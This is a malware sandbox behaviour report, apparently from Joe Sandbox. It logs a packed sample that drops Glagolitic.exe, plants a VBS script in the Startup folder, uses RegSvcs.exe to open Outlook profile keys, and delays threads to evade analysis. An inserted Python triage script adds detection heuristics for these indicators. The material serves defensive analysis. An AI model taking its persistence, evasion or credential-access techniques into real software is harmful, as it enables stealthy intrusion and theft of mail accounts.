Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Binary string: wntdll.pdbUGP source: Glagolitic.exe, 00000002.00000003.873219780.0000000004720000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000002.00000003.869410933.0000000004380000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.985607309.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.986640218.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Glagolitic.exe, 00000002.00000003.873219780.0000000004720000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000002.00000003.869410933.0000000004380000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.985607309.0000000004600000.00000004.00001000.00020000.00000000.sdmp, Glagolitic.exe, 00000005.00000003.986640218.00000000047A0000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 2_2_00416CB5 push ecx; ret 2_2_00416CC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_03119C30 push esp; retf 0313h3_2_03119D55
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeCode function: 5_2_00416CB5 push ecx; ret 5_2_00416CC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E1891E pushad ; iretd 6_2_00E1891F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E18C2F pushfd ; iretd 6_2_00E18C30
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00E18DDF push esp; iretd 6_2_00E18DE0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_06522DBE pushfd ; retf 6_2_06522DC1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: C:\Users\user\Desktop\mKRflLn5sx.exeFile created: C:\Users\user\AppData\Local\croc\Glagolitic.exeJump to dropped file

              Boot Survival

Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbs (3 identical entries)
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 0_2_0047A330
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_00434418
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 2_2_0047A330
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 2_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput | 2_2_00434418
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed | 5_2_0047A330
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Code function: 5_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput | 5_2_00434418
Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (59 identical entries)
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (59 identical entries)
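The Boot Survival entries above (the dropped Glagolitic.exe writing Glagolitic.vbs into the user's Startup folder) together with the earlier File created, Static PE information and Outlook registry rows are the lines an analyst pulls out of a report like this into a triage note. The following Python script is an added example by the editor, not code from Joe Sandbox or from this report: it parses behaviour rows in the glued-together form the extraction produced (event label appended directly to the process path, "Jump to ..." link text at the end), de-duplicates repeated rows, rebuilds the drop chain, and applies the editor's own heuristics for Startup-folder script persistence, UPX packing and Outlook profile access. The event label list, the indicator rules and the embedded sample rows (copied from the report above) are assumptions of the example, not Joe Sandbox signatures.

```python
"""Triage helper for behaviour rows extracted from a Joe Sandbox report.

Added example by the editor; not part of Joe Sandbox or of the report.
The extracted text glues the event label onto the process path, e.g.
"...wscript.exeSection loaded: profapi.dllJump to behavior", so rows are
split on the known labels rather than on whitespace. The indicator rules
below are the editor's own heuristics, not Joe Sandbox signatures.
"""
import re
from dataclasses import dataclass

# Event labels seen in this part of the report (assumption: extend as needed).
EVENT_LABELS = (
    "Section loaded", "Key value queried", "Key opened", "Code function",
    "File created", "Process information set", "Static PE information",
    "API/Special instruction interceptor", "Thread delayed",
)
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)"
    r"(?P<event>" + "|".join(re.escape(label) for label in EVENT_LABELS) + r")"
    r":\s*(?P<value>.*?)(?:Jump to (?:behavior|dropped file))?$"
)


@dataclass(frozen=True)
class Event:
    source: str   # process path, or "initial sample" for static findings
    event: str    # event label, e.g. "File created"
    value: str    # payload with the trailing "Jump to ..." link text removed


def parse_report(text):
    """Parse rows into Events; the report emits one row per observed call,
    so identical rows (the same VBS written to Startup) are kept once."""
    events = []
    for raw in text.strip().splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            events.append(Event(m["source"].strip(), m["event"], m["value"].strip()))
    return list(dict.fromkeys(events))


STARTUP_MARKER = "\\start menu\\programs\\startup\\"
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".ps1", ".bat", ".cmd", ".lnk")
OUTLOOK_PROFILES_MARKER = "\\outlook\\profiles\\"


def drop_chain(events):
    """(creator, created) pairs in report order: who wrote which file."""
    return [(e.source, e.value) for e in events if e.event == "File created"]


def startup_persistence(events):
    """Script-type files written into a Startup folder (run at every logon)."""
    return [e.value for e in events
            if e.event == "File created"
            and STARTUP_MARKER in e.value.lower()
            and e.value.lower().endswith(SCRIPT_EXTS)]


def upx_packed(events):
    """True if static analysis reported UPX section names on the sample."""
    names = {e.value.split(":")[-1].strip().upper()
             for e in events
             if e.event == "Static PE information"
             and e.value.lower().startswith("section name")}
    return bool(names & {"UPX0", "UPX1", "UPX2"})


def mail_credential_access(events):
    """Processes touching Outlook profile keys, where stored account data lives."""
    return sorted({e.source for e in events
                   if e.event in ("Key opened", "Key value queried")
                   and OUTLOOK_PROFILES_MARKER in e.value.lower()})


def triage(text):
    events = parse_report(text)
    return {
        "drop_chain": drop_chain(events),
        "startup_persistence": startup_persistence(events),
        "upx_packed": upx_packed(events),
        "mail_credential_access": mail_credential_access(events),
    }


# Constructed input: rows copied from the report, in the glued-together form
# the extraction produced, including one repeated row.
SAMPLE = r"""
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Users\user\Desktop\mKRflLn5sx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: C:\Users\user\Desktop\mKRflLn5sx.exeFile created: C:\Users\user\AppData\Local\croc\Glagolitic.exeJump to dropped file
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbsJump to dropped file
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Glagolitic.vbsJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
"""

if __name__ == "__main__":
    for key, val in triage(SAMPLE).items():
        print(f"{key}: {val}")
```

On the sample rows the drop chain comes out as mKRflLn5sx.exe writing Glagolitic.exe, which in turn writes Glagolitic.vbs into Startup; the RegSvcs.exe row is flagged because a Microsoft .NET utility has no reason of its own to open Outlook profile keys, which matches the report's mail-credential signature. The heuristics are deliberately narrow: extend STARTUP_MARKER and SCRIPT_EXTS for the all-users Startup path and other launcher types before using this on reports you have not read.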

              Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | API/Special instruction interceptor: Address: 3F64A24
Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | API/Special instruction interceptor: Address: 3EDEA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599641
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598953
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598841
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598733
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598624
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598391
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598277
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598063
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597813
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596103
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595981
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595707
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594737
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598110
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597191Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597063Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596564Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596438Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596328Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594467Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594122Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594016Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593656Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593547Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3065Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6760Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6929Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2888Jump to behavior
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | API coverage: 3.5 %
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | API coverage: 3.8 %
              Source: C:\Users\user\AppData\Local\croc\Glagolitic.exe | API coverage: 3.5 %
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
              Source: C:\Users\user\Desktop\mKRflLn5sx.exe | Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
